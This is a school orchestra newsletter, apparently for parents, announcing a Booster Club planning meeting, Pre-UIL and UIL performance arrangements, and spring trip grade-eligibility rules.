1. BOOSTER CLUB MEETING FEB 22 – IMPORTANT UIL PREP MEETING!

Tuesday, February 22, 7:00 PM, IN-PERSON, Orchestra Room

This is a VERY IMPORTANT meeting! The Booster Club will be planning activities for Pre-UIL, UIL, and Cluster Concert! 

Each year (non-Covid times), the Booster Club decorates the orchestra room for UI and provides food before or after UIL performances for the students. We need parent volunteers to help order, set-up, serve, and clean up food. UIL is during the day on Tuesday – Thursday, March 1-3. 

The students have worked so hard! Please volunteer some of your time to help celebrate their accomplishments!

2. PRE-UIL 

UIL Season is here! Please make sure you are bringing instruments home and practicing. Don’t forget to bring them back to school for class!

Pre-UIL is the “dress rehearsal” for our UIL Performance. Each orchestra will perform for judges who will offer comments and give them a rating. They will also go through the same sight reading process as they have in UIL. 

Pre-UIL, Wed, February 23 at AHS 

Concert Attire: Tuxes and Dresses, please pull these out and make sure they are clean and pressed. 

3. UIL 

Please see our UIL performances below. All UIL performances will be at the AISD CVPA. Parents are welcome to come, listen, and support our orchestras! 

Students will be excused from class. Detailed information for each orchestra can be found on the Daily Announcement Slides.

4. SPRING TRIP ELIGIBILITY- VERY IMPORTANT

To be eligible to participate in the spring trip, students must pass all classes for this 5th Six Weeks. This 5th Six Weeks ends on Fri, April 9. Students not passing all their classes WILL NOT be eligible to travel per AISD guidelines. In addition, students ineligible to travel as of April 9 WILL NOT receive a refund as all payments will have been made to vendors for the trip. Please monitor your grades very closely.
